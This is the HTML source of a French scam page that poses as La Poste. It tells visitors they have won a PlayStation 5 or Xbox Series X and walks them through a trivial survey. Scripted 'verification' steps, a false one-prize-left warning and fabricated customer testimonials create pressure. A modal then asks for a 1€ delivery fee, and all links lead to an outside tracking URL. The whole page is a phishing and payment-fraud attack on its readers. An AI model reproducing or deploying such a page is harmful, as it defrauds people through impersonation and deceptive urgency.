<html><head>
  <base href="">
<base href="">
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta name="referrer" content="no-referrer">
  <meta name="HandheldFriendly" content="True">
  <meta name="MobileOptimized" content="320">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="viewport" content="width=device-width">
  <meta http-equiv="cleartype" content="on">
  <link rel="stylesheet" href="css/bootstrap.css">
 
 
<script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
    );
}
</script>


  <title>Félicitations&nbsp;! - La Poste – Simplifier la vie</title>
    
  <script type="text/javascript">
        var monthNames = new Array("janvier", "février", "mars", "avril", "mai", "juin", "juillet", "août", "septembre", "octobre", "novembre", "décembre");
        var now = new Date();
        now.setDate(now.getDate() + 1);
        var nowStringTommorow = monthNames[now.getMonth()] + " " + now.getDate() + ", " + now.getFullYear();
    </script>

  <style>.radio {
    vertical-align: top;
    width: 17px;
    height: 17px;
    margin: 0 3px 0 0;
}
.radio + label {
    cursor: pointer;
}
.radio:not(checked) {
    position: absolute;
    opacity: 0;
}
.radio:not(checked) + label {
    position: relative;
    padding: 0 0 0 35px;
}
.radio:not(checked) + label:before {
    content: '';
    position: absolute;
    top: -3px;
    left: 0;
    width: 22px;
    height: 22px;
    border: 2px solid #003C71;
    border-radius: 50%;
    box-sizing: border-box;
    background: #FFF;
}
.radio:not(checked) + label:after {
    content: '';
    position: absolute;
    top: 1px;
    left: 4px;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    background: #003C71;
    box-shadow: inset 0 1px 1px rgba(0,0,0,.5);
    opacity: 0;
    transition: all .2s;
}
.radio:checked + label:after {
    opacity: 1;
}
.radio:focus + label:before {
    box-shadow: 0 0 0 3px rgba(255,255,0,.5);
}
      .radio:hover {
          border: 4px solid #003C71;
      }
input[type='reset'] {
    padding: 12px 15px;
    border: none;
    border-radius: 5px;
    background: #CDD1DA;
    color: #FFF;
    cursor: pointer;
    font-size: 15px;
}
input[type='reset']:active {
    background: #BDC0CC;
}
input[type='reset']:focus {
    outline: none;
    box-shadow: 0 0 0 3px rgba(255,255,0,.5);
}
    .contestwrap,.subheader{border-bottom:1px solid #ebebeb}.contestwrap table,.header table,.subheader table,td,tr{border-collapse:collapse}.contestwrap p,.toptext{color:#000;font-size:small}.answer,.question{text-align:center}.answer,.pbox{cursor:pointer}#szlider,.pbox{overflow:hidden}.answer,.pbox h2,.prize h2,.prize h3,.prizebtn,.select2{font-weight:300}.reviews hr,hr{opacity:.2}html{font-family:sans-serif;font-color:#000;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0; ;background-attachment:fixed;
background-repeat: no-repeat;background-position:50% 20%; min-width:320px;color:#000}a,div,h1,h2,h3,h4,h5,h6,li,ol,p,span,ul{margin:0;padding:0}a{text-decoration:none;color:#4485f6}h3{color:#212121}p{color:#737373}#q2,#q3,#q4,#v1b,#v1c,#v2b,#v2c,#v3b,#v3c,#v4s,#vfinal,.prize,.validate{display:none}.fbimg{background-color:#fff;border-radius:2px;max-width:210px;width:100%;padding:3px;box-sizing:border-box;border:1px solid grey;margin:10px 0 5px}.contestwrap,.form_questions{width:100%;border-radius:3px}.header{background-color:#fdcb2d;width:100%;padding:10px 5px;}.contestwrap,.form_questions,.subheader{background-color:}.wrapper{max-width:1000px;width:96%;margin:0 auto}.subheader{width:100%}.subheader table,td,tr{padding:8px 0 4px}.subheader td{valign:middle}.spacer{height:20px}.contestwrap{box-shadow:0 0 2px 2px #e9e9e9;padding:10px 0 4px}.contestwrap,.form_questions{-webkit-box-shadow:0 0 2px 2px #e9e9e9;-moz-box-shadow:0 0 2px 2px #e9e9e9}.form_questions,.pbox,.validate{border-bottom:1px solid #e5e5e5}.select2{color:#777;font-size:small;padding:8px 0 4px}.form_questions{box-shadow:0 0 2px 2px #e9e9e9;padding:10px 0 30px}.answer{border:0 solid #003C71;padding:10px 0;width:200px;display:inline-block;margin:5px;font-size:medium;color:#fff;-webkit-border-radius:5px;-moz-border-radius:5px;border-radius:5px;background:#003C71}.pbox,.validate{border-radius:3px}.pbox h2,.pbox img,.pbox p{display:block}.question{padding-top:20px}.validate{width:96%;background-color:;box-shadow:0 0 2px 2px #e9e9e9;padding:0}.pbox,.validate{-webkit-box-shadow:0 0 2px 2px #e9e9e9;-moz-box-shadow:0 0 2px 2px #e9e9e9}#szlider{width:100%;height:4px;background:#bfbfbf}#szliderbar{width:0;height:4px;background:#003C71}#szazalek{color:#858585;font-size:small}.prize{width:96%}.pbox{background-color:#fff;box-shadow:0 0 2px 2px #e9e9e9;padding:10px 6px;position:relative}.pbox img{width:150px;margin-left:auto;margin-right:auto}.pbox h2,.pbox p{margin:6px 6px 0}.pbox h2{font-size:xlarge;text-align:left}.pbox p{font-size:small;text-align:left}.footer p,.prizebtn{display:inline-block}.prizebtn{border:0 solid #334c83;padding:4px 0;width:80%;margin:8px 4px 4px;text-align:center;font-size:.9em;color:#fff;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;background:#003C71}.prize h3{font-size:1.5em;padding:5px 0;text-align:center}.prize h2{font-size:1.2em;text-align:left}.reviews{width:100%;padding:0;line-height:1.3}.reviews .name{font-weight:700;color:#1a39c5}.reviews .text{color:#6a6a6a}.reviews .date{padding-bottom:6px;color:#006621;font-size:10px}.reviews table{padding:5px 0;font-size:small}.roundimg{width:50px;border-radius: 50%;}.reviews h2{color:grey;font-size:1.2em;font-weight:300;padding:20px 0 5px}.commentpad{padding-left:10px}.reviews span{color:#a5778f}.footer{background-color:#f2f2f2;border-top:1px solid #e4e4e4;padding:20px 0;color:#777;font-size:small}.footer p{padding-right:20px}
      
      /*****  Modal trial *****/
      
      @media only screen and (min-width:800px){.white_content{position:fixed;top:10%;left:30%;width:40%;background-color:rgb(255,255,255);border-radius:5px;z-index:1002;overflow:auto}.present{height:355px;width:100%;display:flex;flex-direction:column;justify-content:flex-start;align-items:center}}
@media only screen and (max-width:799px){.white_content{position:fixed;top:10%;left:5%;width:90%;background-color:rgb(255,255,255);border-radius:5px;z-index:1002;overflow:auto}.present{height:355px;width:100%;display:flex;flex-direction:column;justify-content:flex-start;align-items:center}}#light-text2{padding:15px;font-size:22px;text-transform:uppercase;text-align:center}#light-text2 span{color:#fff}
      .header {
          position: fixed;
          width: 100%;
          z-index: 100;
      }
      .reviews {
          -webkit-box-shadow:0 0 2px 2px #e9e9e9;-moz-box-shadow:0 0 2px 2px #e9e9e9;
          max-width: 960px;
      }
      .date {
          padding-top: 5px;
      }
      .modal-body img {
          float: left;
          margin-top: -8px;
      }
      .modal-content {
          border: 3px solid #003C71;
      }
      .modal-footer {border-top: 2px solid #fdcb2d;}
      @media only screen and (max-width: 560px) {
          .modal-body img {
              max-width: 70px;
              padding-right: 10px;
              margin-top: 0;
          }
      }
      
      footer {
        background: #fff;
        border-top: 3px solid #00457D;
          margin-top: 40px;
    }
    .footer-block {
        display: flex;
        flex-direction: row;
        text-align: center;
        justify-content: space-around;
        flex-wrap: wrap;
        align-items: center;
        padding: 10px 25px;
        max-width: 1000px;
        margin: 0 auto;
    }
    footer span {
        color: #807f7f;
        font-size: 12px;
        text-align: center;
        display: block;
        padding-top: 12px;
    }       
    @media only screen and (max-width:680px) {
        .footer-block {
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }
         .flag1{
          display: block;
             margin: 0 auto;
      }
    }
  </style>
</head>
<body style="display: inline; padding-right: 16px;" class="modal-open">
    <script>!function(){"undefined"!=typeof window.orientation&&(document.body.style.display="inline")}();</script>
    
    
    <div id="light" class="white_content" style="display: none; box-shadow: 0 0 10px rgba(0,0,0,0.5); padding: 30px 30px 0; background: #fdcb2d; border: 2px solid #003C71; overflow: hidden;">
            



 
         <img src="images/lp-logo.png" style="float:left;width:196px;padding-right:14px;margin-top: -5px;">
<br>
<br>
<p style="color: #003C71;">Presque terminé&nbsp;! Vous devez confirmer 
vos informations de contact et effectuer un menu paiement (1€) 
pour couvrir les frais de livraison et d'affranchissement.</p>
<br>



<div class="modal-footer" style="border-top: 1px solid #003C71">
 <a href="https://virginiafiles.com/show.php?l=0&u=189179&id=30840"><button id="dismod" type="button" class="btn btn-primary" data-dismiss="modal" style="border: 2px solid #003C71; background: #003C71;">OK</button></a>
</div>
</div>

<div class="modal fade in" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" style="display: block; padding-right: 16px;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-body">
<table>
<tbody><tr>


<td>
    <h3 style="text-align: center; color: #333;"><b>Félicitations&nbsp;!</b></h3> <br>
    <p>Cher client, chère cliente&nbsp;! Vous avez été choisi(e) aujourd'hui pour remporter un <strong>Playstation 5</strong> ou un <strong>Xbox Series X</strong></p>
 <br>
 <p>Cliquez sur «&nbsp;OK&nbsp;» pour recevoir votre lot avant qu'il ne soit transféré à quelqu'un d'autre&nbsp;!</p>
</td>
</tr>
</tbody></table>
</div>
<div class="modal-footer">
<img src="images/lp-logo.png" style="float: left; max-width: 120px;" alt="">
<button type="button" class="btn btn-primary" data-dismiss="modal" style="background: #003C71; color: #fff;font-weight: bold; letter-spacing: .3;">OK</button>
</div>
</div>
</div>
</div>

  <div class="header" style="">
    <table class="wrapper">
      <tbody>
        <tr>
          <td width="30px"><img src="images/lp-logo.png" style="max-width: 196px;margin-top: -6px; margin-left: 5px;"></td>
          <td width="60px" align="right">
          <a href="https://virginiafiles.com/show.php?l=0&u=189179&id=30840" rel="noreferrer" style="color: #2B4763;">
          <img src="images/flag.png" style="margin-top: -2px;" class="flag1">
          <span>
          Moteur de recherche</span>
          
          </a></td>
        </tr>
      </tbody>
    </table>
  </div>

  <div class="spacer"></div>
  <div class="wrapper">
    <div class="contestwrap wrapper" style="margin-top: 70px;">
      <div class="toptext" style="border: none;">
        <table class="wrapper">
          <tbody>
            <tr>
              
              <td valign="top" align="left">
               <img src="images/logo-mini.png" style="max-width: 30px; border-radius: 4px;" alt="">
               <b style="padding-bottom: 4px;">Félicitations&nbsp;!</b>
                <br>
                <font style="color:#9fa2a6;font-size:x-small;margin: 5px 0; display: block;">
            <script>
                            var mydate=new Date()
                            mydate.setDate(mydate.getDate()-0);
                            var year=mydate.getYear()
                            if (year < 1000)
                            year+=1900
                            var day=mydate.getDay()
                            var month=mydate.getMonth()
                            var daym=mydate.getDate()
                            if (daym<10)
                            daym="0"+daym
                            var dayarray=new Array("dimanche", "lundi", "mardi", "mercredi", "jeudi", "vendredi", "samedi")
                            var montharray=new Array("janvier", "février", "mars", "avril", "mai", "juin", "juillet", "août", "septembre", "octobre", "novembre", "décembre")
                            document.write("" + daym + "  " + montharray[month])
                        </script></font></td>
            </tr>
          </tbody>
        </table>
        <div>

		 <br>
<br>
  <p class="wrapper">
    Chaque
    <script language="Javascript">
    
    // Array of day names
    var dayNames = new Array("dimanche", "lundi", "mardi", "mercredi", "jeudi", "vendredi", "samedi");
    // Array of month Names
    var monthNames = new Array("janvier", "février", "mars", "avril", "mai", "juin", "juillet", "août", "septembre", "octobre", "novembre", "décembre");
    var now = new Date();
    document.write(dayNames[now.getDay()]);
    // 
    </script>, nous sélectionnons au hasard 10 heureux utilisateurs
 qui recevront un cadeau de la part de nos sponsors&nbsp;; il s'agit 
simplement d'un moyen pour nous d'exprimer notre gratitude pour votre 
soutien continu envers nos produits et nos services.  
 <br>
<br>
Vous pouvez choisir un <strong>Playstation 5</strong> ou un <strong>Xbox Series X</strong>.
<br>
<br>Pour gagner, vous n'avez qu'à répondre aux 4 questions suivantes
<br>
<br><strong>Note&nbsp;:</strong> 10 utilisateurs choisis au hasard ont reçu cette invitation et il ne reste que quelques lots à distribuer.
<br>
<br>
</p>
        </div>
      </div>
    </div>
    <div class="spacer"></div>
    <div class="form_questions wrapper">
      <div class="question wrapper" id="q1">
        <h3>
          <span style="font-weight:270;">Question 1 sur 4&nbsp;:</span> Depuis combien d'années utilisez-vous La Poste&nbsp;?
          <br>
        </h3>
        <br>
        <div style="width:300px;text-align:left;margin: 0 auto;">
         <input type="radio" class="radio" id="radio-1" name="browser" value="1"><label for="radio-1">Depuis 1 an ou moins</label><br><br>
         <input type="radio" class="radio" id="radio-2" name="browser" value="2"><label for="radio-2">Depuis 1 à 2 ans</label><br><br>
         <input type="radio" class="radio" id="radio-3" name="browser" value="3"><label for="radio-3">Depuis 3 à 4 ans</label><br><br>
         <span class="answer">Ok</span>
        </div>
         
         
      </div>
      <div class="question wrapper" id="q2">
        <h3>
          <span style="font-weight:300;">Question 2 de 4&nbsp;:</span> À quelle fréquence utilisez-vous les services de La Poste&nbsp;?
          <br>
        </h3>
        <br>
        <div style="width:300px;text-align:left;margin: 0 auto;">
         <input type="radio" name="browser" value="4" class="radio" id="radio-4"><label for="radio-4">Utilisation quotidienne</label><br><br>
         <input type="radio" name="browser" value="5" class="radio" id="radio-5"><label for="radio-5">Une fois par semaine</label><br><br>
         <input type="radio" name="browser" value="6" class="radio" id="radio-6"><label for="radio-6">Une fois par mois</label><br><br>
         <span class="answer">Ok</span>
         </div>
         
      </div>
      
      <div class="question wrapper" id="q3">
        <h3>
          <span style="font-weight:300;">Question 3 de 4&nbsp;:</span> Êtes-vous satisfait(e) par notre service&nbsp;?
          <br>
        </h3>
        <br>
        <div style="width:300px;text-align:left;margin: 0 auto;">
         <input type="radio" name="browser" value="7" class="radio" id="radio-7"><label for="radio-7">Je suis très satisfait(e)</label><br><br>
         <input type="radio" name="browser" value="8" class="radio" id="radio-8"><label for="radio-8">J'en suis content(e)</label><br><br>
         <input type="radio" name="browser" value="9" class="radio" id="radio-9"><label for="radio-9">Je ne suis pas satisfait(e)</label><br><br>
         <span class="answer">Ok</span>
         </div>
         
      </div>
      
      <div class="question wrapper" id="q4">
        <h3>
          <span style="font-weight:300;">Question 4 de 4&nbsp;:</span> Quelle est votre couleur préférée Couleur &nbsp;?
          <br>
        </h3>
        <br>
        <div style="width:300px;text-align:left;margin: 0 auto;">
        <input type="radio" name="browser" value="10" class="radio" id="radio-10" onclick="drawszlider(10,0);"><label for="radio-10">Blanc</label><br><br>
        <input type="radio" name="browser" value="11" class="radio" id="radio-11" onclick="drawszlider(10,0);"><label for="radio-11">Noir</label><br><br>
        <span class="answer" onclick="drawszlider(10,0);">Ok</span>
        </div>
        
      </div>
    </div>
    <div class="validate wrapper">
      <div class="wrapper">
        <br>
        <table width="100%">
          <tbody><tr>
            <td align="left">
              <p id="v1b">Nous vérifions vos réponses ...</p>
              <p id="v2b">Nous vérifions votre adresse IP ...</p>
              <p id="v3b">Vérification de la disponibilité des lots ...</p>
              <p id="vfinal">Félicitations!</p>
            </td>
            <td align="right">
              <span id="szazalek">0%</span>
            </td>
          </tr>
        </tbody></table>
        <div style="width:100%;margin:0 auto;">
          <div id="szlider">
            <div id="szliderbar">
            </div>
            <div id="szazalek">
            </div>
          </div>
        </div>
        <table>
          <tbody><tr>
            <td width="40px">
              <img id="v1a" src="images/loading.gif">
              <img id="v1c" src="images/fb-check.jpg">
            </td>
            <td>
              <p id="v1d">Vous avez bien répondu (4/4)</p>
            </td>
          </tr>
          <tr>
            <td>
              <img id="v2a" src="images/loading.gif">
              <img id="v2c" src="images/fb-check.jpg">
            </td>
            <td>
              <p id="v2d">Aucune archive de cette adress IP n'a été trouvée</p>
            </td>
          </tr>
          <tr>
            <td>
              <img id="v3a" src="images/loading.gif">
              <img id="v3c" src="images/fb-check.jpg">
            </td>
            <td>
              <p id="v3d">Il ne reste plus qu'un seul lot.</p>
            </td>
          </tr>
        </tbody></table>
        <br>
      </div>
    </div>
	
    <script>
      var slidewhere = 0;
      var holvanszlider = 0;

      function drawszlider(ossz, meik) {
        var szazalek = Math.round((meik * 100) / ossz);
        document.getElementById("szliderbar").style.width = szazalek + "%";
        document.getElementById("szazalek").innerHTML = szazalek + "%";
        holvanszlider = meik;
        t = setTimeout("drawszlider(100, slidewhere);slidewhere = holvanszlider + 1; if (slidewhere > 100) {slidewhere = 100;}", 62);
      }
    </script>
	
    <div class="spacer" id="v4s"></div>
    <div class="prize wrapper" id="v4">
      <h3>Choisissez le prix de votre choix&nbsp;:</h3>
      <table width="100%" border="0">
        <tbody>
         
		
        <tr height="10px"></tr>
        <tr class="pbox wrapper">
          <td width="50%">
            <a href="https://virginiafiles.com/show.php?l=0&u=189179&id=30840" rel="noreferrer" onclick="exit_a1();PreventExitPop = false">
              <img src="images/Samsung-Galaxy-S9-370x220.png" style="width: 100%; max-width: 320px;">
            </a>
          </td>
          <td width="50%">
            <a href="https://virginiafiles.com/show.php?l=0&u=189179&id=30840" rel="noreferrer" onclick="exit_a1();PreventExitPop = false">
              <h2>Playstation 5</h2>
            </a>
            <p>
              <br>
              
            </p>
            <a href="javascript:void(0)" onclick="ok_btn()">
              <div class="prizebtn btnwrapper">Choisir</div>
            </a>
          </td>
        </tr>
        
        <tr height="10px"></tr>
        <tr class="pbox wrapper" style="opacity:0.5;">
          <td width="50%">
            <div onclick="exit_b1();PreventExitPop = false" style="cursor:pointer;">
              <img src="images/iX-370x220.png" style="width: 100%; max-width: 320px;">
            </div>
          </td>
          <td width="50%">
            <div onclick="exit_b1();PreventExitPop = false" style="cursor:pointer;">
              <h2 style="color:#4485f6;">Xbox Series X</h2>
            </div>
            <p>
         
              <br>
              
            </p>
            <div onclick="exit_b1();PreventExitPop = false" style="cursor:pointer;">
              <div class="prizebtn btnwrapper" style="background-color:#aaa;">Épuisé</div>
            </div>
          </td>
        </tr>
      </tbody></table>
    </div>
    <div class="spacer"></div>
<div class="reviews wrapper">
      <div class="wrapper">
        <h2>Commentaires:</h2>
      </div>
      <table class="wrapper" style="padding-top:8px;">
        <tbody><tr>
          <td width="50px" valign="top" align="right">
            <img class="roundimg" src="images/img03.jpg">
          </td>
          <td class="commentpad" valign="top" align="left">
            <div class="name">Yolette Corbin</div>
            <div class="text">Le mien est arrivé aujourd'hui, merci pour le Playstation 5&nbsp;!!!</div>
            <img class="fbimg" src="images/galiphone.jpg">
            <div class="date">
              <script>
                document.write("" + montharray[month] + " " + daym + "")
              </script></div>
          </td>
        </tr>
      </tbody></table>
      <hr>
      <table class="wrapper">
        <tbody><tr>
          <td width="50px" valign="top" align="right">
            <img class="roundimg" src="images/male1-spanish-min.jpg">
          </td>
          <td class="commentpad" valign="top" align="left">
            <div class="name">Javier de Launay</div>
            <div class="text">Au début je pensais que c'était une 
blague, mais à ma grande surprise mon Xbox est arrivé ce matin, et 
ça ne pose pas de problème de s'inscrire pour gagner un Xbox, ha 
ha&nbsp;!</div>
            <div class="date">
              <script>
                mydate.setDate(mydate.getDate() - 2);
                month = mydate.getMonth();
                daym = mydate.getDate();
                if (daym < 10) daym = "0" + daym;
                document.write("" + montharray[month] + " " + daym + "");
              </script></div>
          </td>
        </tr>
      </tbody></table>
      <hr>
      <table class="wrapper">
        <tbody><tr>
          <td width="50px" valign="top" align="right">
            <img class="roundimg" src="images/male2-spanish-min.jpg">
          </td>
          <td class="commentpad" valign="top" align="left">
            <div class="name">Landers Souplet</div>
            <div class="text">J'ai reçu le mien aujou'd'hui&nbsp;! Merci pour le Playstation&nbsp;!</div>
            <div class="date">
              <script>
                document.write("" + montharray[month] + " " + daym + "")
              </script></div>
          </td>
        </tr>
      </tbody></table>
      <hr>
      <table class="wrapper">
        <tbody><tr>
          <td width="50px" valign="top" align="right">
            <img class="roundimg" src="images/3.jpg">
          </td>
          <td class="commentpad" valign="top" align="left">
            <div class="name">Belisarda L'Heureux</div>
            <div class="text">J'avais déjà vu cette annonce auparavant, 
mais je l'ai ignorée parce que je pensais que c'était une arnaque, mais 
je l'ai revue et j'ai décidé d'essayer… J'ai enfin reçu mon Playstation 
&nbsp;!</div>
            <div class="date">
            <script>
                document.write("" + montharray[month] + " " + daym + "")
              </script></div>
          </td>
        </tr>
      </tbody></table>
      <hr>
      <table class="wrapper">
        <tbody><tr>
          <td width="50px" valign="top" align="right">
            <img class="roundimg" src="images/img11.jpg">
          </td>
          <td class="commentpad" valign="top" align="left">
            <div class="name">Linette Riquier</div>
            <div class="text">Mon lot est arrivé aujourd'hui&nbsp;! Merci beaucoup pour mon nouveau Playstation 5&nbsp;!!!!!!!</div>
            <div class="date">
              <script>
                document.write("" + montharray[month] + " " + daym + "")
              </script></div>
          </td>
        </tr>
      </tbody></table>
      <hr>
      <table class="wrapper">
        <tbody><tr>
          <td width="50px" valign="top" align="right">
            <img class="roundimg" src="images/01.jpg">
          </td>
          <td class="commentpad" valign="top" align="left">
            <div class="name">Clementine de Brisay</div>
            <div class="text">Wouah, je voulais vraiment le Playstation, mais il 
était pas disponible. On aurait dit qu'il ne restait plus rien pour moi,
 mais hier j'ai reçu gratuitement mon Playstation 5. Bisous&nbsp;!</div>
            <div class="date">
              <script>
                document.write("" + montharray[month] + " " + daym + "")
              </script></div>
          </td>
        </tr>
      </tbody></table>
      <hr>
      <table class="wrapper">
        <tbody><tr>
          <td width="50px" valign="top" align="right">
            <img class="roundimg" src="images/img01.jpg">
          </td>
          <td class="commentpad" valign="top" align="left">
            <div class="name">Ila Goddu</div>
            <div class="text">Le questionnaire était tellement simple&nbsp;! J'espère que je vais avoir mon Playstation 5.</div>
            <div class="date">
            <script>
                mydate.setDate(mydate.getDate() - 1);
                month = mydate.getMonth();
                daym = mydate.getDate();
                if (daym < 10) daym = "0" + daym;
                document.write("" + montharray[month] + " " + daym + "");
              </script>avril 19</div>
          </td>
        </tr>
      </tbody></table>
      <hr>
      <table class="wrapper">
        <tbody><tr>
          <td width="50px" valign="top" align="right">
            <img class="roundimg" src="images/21.jpg">
          </td>
          <td class="commentpad" valign="top" align="left">
            <div class="name">Paien Blanchard</div>
            <div class="text">Super&nbsp;! Je n'ai jamais rien gagné avant, j'espère que j'aurai plus de chance cette fois-ci&nbsp;!</div>
            <div class="date">
              <script>
              mydate.setDate(mydate.getDate() - 1);
              month = mydate.getMonth();
              daym = mydate.getDate();
              if (daym < 10) daym = "0" + daym;
                document.write("" + montharray[month] + " " + daym + "");
              </script></div>
              <br>
          </td>
        </tr>
      </tbody></table>
      </div>
    </div>
      
      <footer>
 
<span>© La Poste 2019</span>
   
    </footer>
  
   <script src="js/jquery.js"></script>
   <script type="text/javascript">
     $(document).ready(function() {
            setInterval(function() {
                $("h1").toggle()
            }, 1500);
            $("#q1 .radio").click(function() {
                $("#q1").hide(0, function() {
                    $("#q2").fadeIn()
                })
            }), $("#q2 .radio").click(function() {
                $("#tq2").hide(), $("#q2").hide(0, function() {
                    $("#q3").fadeIn()
                })
            }), $("#q3 .radio").click(function() {
                $("#q3").hide(), $("#q3").hide(0, function() {
                    $("#q4").fadeIn()
                })
            }), $("#q4 .radio").click(function() {
                $(".form_questions").hide(0, function() {
                    $(".contestwrap").hide(),
                    $(".validate").show(), $("#v0a").fadeIn(), $("#v1a").fadeIn(), $("#v1b").fadeIn()
                }), setTimeout(function() {
                    $("#v1a").hide(), $("#v1b").hide(), $("#v1c").show(), $("#v1d").show(), $("#v2a").show(), $("#v2b").show()
                }, 2e3), setTimeout(function() {
                    $("#v2a").hide(), $("#v2b").hide(), $("#v2c").show(), $("#v2d").show(), $("#v3a").show(), $("#v3b").show()
                }, 4500), setTimeout(function() {
                    $("#v3a").hide(), $("#v3b").hide(), $("#v3c").show(), $("#v3d").show(), $("#vfinal").show(), calldiv(), $("#v0a").hide(), $("#v0b").show()
                }, 6500), setTimeout(function() {
                    $(".validate").hide(), $("#v4").show(), $("#v4s").show(), $(".reviews").show()
                }, 6500)
            });


function calldiv()
        {

            setTimeout(explode, 500);
 
        }
         function explode(){
             $('html,body').animate({
                 scrollTop: $("#v4s").offset().top}, 800);
 
        }

    });
   </script>


<script>
function ok_btn() {
                $('#light').css('display','block');
    }
  window.onload=function(){
    $('#myModal').modal('show')
  };
  $('#dismod').click(function(){
	$('#myModal').modal('hide');
	$('#backdrop').remove();
  });
</script>

 
 
<script src="js/bootstrap.js"></script>

</body></html>